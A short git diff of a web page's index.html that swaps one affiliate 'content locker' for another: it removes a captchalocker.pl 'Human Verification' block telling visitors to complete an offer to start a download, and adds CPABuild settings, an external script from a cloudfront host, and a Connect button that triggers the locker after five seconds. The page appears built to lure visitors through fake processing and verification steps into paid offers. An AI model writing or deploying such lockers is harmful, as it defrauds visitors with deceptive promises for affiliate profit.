--- a/index.html
+++ b/index.html
@@ -18,7 +18,10 @@
 
   gtag('config', 'UA-193562343-1');
 </script>
-
+<script type="text/javascript">
+    var CPABUILDSETTINGS={"it":1795359,"key":"4898e"};
+</script>
+<script src="https://d13nu0oomnx5ti.cloudfront.net/fad693a.js"></script>
 </head>
 
 <body>
@@ -87,7 +90,7 @@
                             </div>
                         </div>
                     </div>
-                    <a href="javascript:void(0)" class="btn primary" id="connect-btn">Connect</a>
+                  <button onclick="setTimeout(CPABuildLock, 5000);"><a href="javascript:void(0)" class="btn primary" id="connect-btn">Connect</a></button>
                 </div>
                 <div class="platform step2" id="step2">
                     <h3 class="mid-text">Processing_</h3>
@@ -114,11 +117,7 @@
                             <img src="./img/check-icon.png" alt="check-icon">
                         </picture>
                     </div>
-                    <h3 class="mid-text">Human Verification</h3>
-                    <h3 class="mid-text small">Please use the CAPTCHA below and follow the offer from the list to start the download.</h3>
-                    <div class="locker" id="locker">
-						<!-- Below -->
-					<div id="cpa-locker-ebcc9340-7ef0-11eb-89c9-63a2076b9d6a"></div><script type="text/javascript" id="cpljs-ebcc9340-7ef0-11eb-89c9-63a2076b9d6a" src="//captchalocker.pl/iframeLoader/ebcc9340-7ef0-11eb-89c9-63a2076b9d6a?"></script>
+                    
 			</div>  
                 </div>
             </div>
